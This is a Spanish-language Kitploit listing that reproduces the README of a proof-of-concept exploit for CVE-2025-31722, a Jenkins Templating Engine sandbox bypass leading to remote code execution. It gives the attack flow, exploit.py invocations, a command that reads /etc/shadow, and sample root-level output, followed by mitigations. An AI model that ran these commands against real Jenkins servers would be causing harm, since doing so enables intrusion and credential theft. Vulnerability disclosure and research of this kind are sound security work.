Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-31722 — Prueba de concepto de exploit para la omisión del sandbox del plugin Jenkins Templating Engine (CVE-2025-31722) que permite la ejecución remota de código mediante la inyección de una biblioteca Groovy maliciosa. | Kitploit
Herramientas/GitHubGitHub/h3raklez/cve-2025-31722
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

Prueba de concepto de exploit para la omisión del sandbox del plugin Jenkins Templating Engine (CVE-2025-31722) que permite la ejecución remota de código mediante la inyección de una biblioteca Groovy maliciosa.

Ver Repositorio
34hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-31722 — Jenkins Templating Engine RCE

Solo con fines educativos y de investigación de seguridad autorizada.

Descripción

Vulnerabilidad de bypass de sandbox en el plugin Jenkins Templating Engine (JTE) <= 2.5.3 que permite a un usuario con pocos privilegios ejecutar código arbitrario en el servidor Jenkins.

La falla ocurre porque JTE carga librerías desde un repositorio git externo definido en una configuración GovernanceTier a nivel de carpeta y ejecuta los pasos de esas librerías fuera del sandbox de Groovy, independientemente del nivel de privilegio del usuario que creó el trabajo.

CVSS: 8.8 (Alta)
Tipo: Bypass de Sandbox → RCE
Componente afectado: plugin pipeline-templating-engine ≤ 2.5.3
Versión corregida: 2.5.4+


Flujo de ataque

root@kitploit:~
Atacante (Kali)                          Servidor Jenkins
───────────────                          ──────────────
1. Crea repo git con evil.groovy
2. Inicia demonio git en :9418
3. Crea carpeta en Jenkins         →    Carpeta con GovernanceTier
   apuntando a git://KALI:9418/…        apuntando al repo del atacante
4. Crea trabajo con plantilla AdHoc →    El trabajo llama a evil()
5. Dispara la construcción          →    JTE clona el repo desde Kali
                                        Ejecuta evil() fuera del sandbox
                                    ←    RCE como usuario Jenkins

Requisitos

Servidor Jenkins (objetivo)

  • Jenkins con el plugin Templating Engine 2.5.3 instalado
  • Plugins: cloudbees-folder, git, workflow-aggregator
  • CSRF deshabilitado
  • Usuario attacker con permisos: Item/READ, Item/CREATE, Item/CONFIGURE, Item/BUILD
  • Nodo integrado en línea con al menos 1 ejecutor
  • Conectividad de red saliente desde el servidor a la IP del atacante en el puerto 9418

Máquina atacante (Kali)

  • Python 3.8+
  • git instalado
  • Puerto 9418 accesible desde el servidor Jenkins
  • Librería Python: requests
root@kitploit:~
pip install requests

Configuración del laboratorio

La configuración instalada en un servidor Debian/Ubuntu tenía Jenkins instalado, usuarios configurados, permisos y los plugins requeridos. No crea ningún contenido malicioso — eso se maneja exclusivamente con el PoC.


Uso

Explotación básica

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

Comando personalizado

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

Limpieza

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

Parámetros

ParámetroDescripciónRequerido
--urlURL base de JenkinsSí
--userUsuario con permisos Item/CREATE+CONFIGURE+BUILDSí
--passContraseña del usuarioSí
--git-hostIP de Kali accesible desde JenkinsSí
--cmdComando a ejecutar en el servidor (por defecto: id && hostname && cat /etc/passwd)No
--cleanupElimina la carpeta, el trabajo y el repo creados por el exploitNo

Cómo funciona el PoC

  1. setup_repo() — Crea ~/jte-exploit/evil-lib/steps/evil.groovy en Kali con el comando a ejecutar
  2. start_git_daemon() — Inicia git daemon en Kali en el puerto 9418
  3. create_folder() — Crea una carpeta en Jenkins con un GovernanceTier apuntando a git://KALI:9418/jte-exploit
  4. create_job() — Crea un trabajo con AdHocTemplateFlowDefinition que declara evil-lib y llama a evil()
  5. trigger_and_wait() — Dispara la construcción y espera el resultado
  6. print_output() — Muestra la salida de la consola con el resultado del RCE

El demonio git permanece activo durante todo el ciclo de construcción y se termina automáticamente una vez que la construcción se completa.


Salida esperada

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  Objetivo : http://10.211.55.10:8080
  Git host : 10.211.55.7
  Comando  : id && hostname && cat /etc/passwd
=================================================================

[+] Autenticado como: attacker (id=attacker)
[+] Repo creado: /root/jte-exploit
[+] Paso malicioso: evil-lib/steps/evil.groovy
[+] Demonio git ejecutándose en git://10.211.55.7:9418/jte-exploit
[+] Carpeta creada
[+] Trabajo creado
[+] Construcción encolada

=================================================================
  CVE-2025-31722 — SALIDA RCE
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

Mitigación

  • Actualice el plugin Templating Engine a la versión 2.5.4 o posterior
  • Restrinja los permisos Item/CREATE y Item/CONFIGURE solo a usuarios de confianza
  • Habilite la protección CSRF en Jenkins
  • Audite las carpetas con configuraciones GovernanceTier que apunten a repositorios externos

Referencias

  • Aviso de seguridad de Jenkins
  • Repositorio del plugin JTE en GitHub

Aviso legal: Este PoC está destinado únicamente para fines educativos y pruebas en entornos controlados. Usarlo contra sistemas sin autorización explícita es ilegal.

Descargar herramienta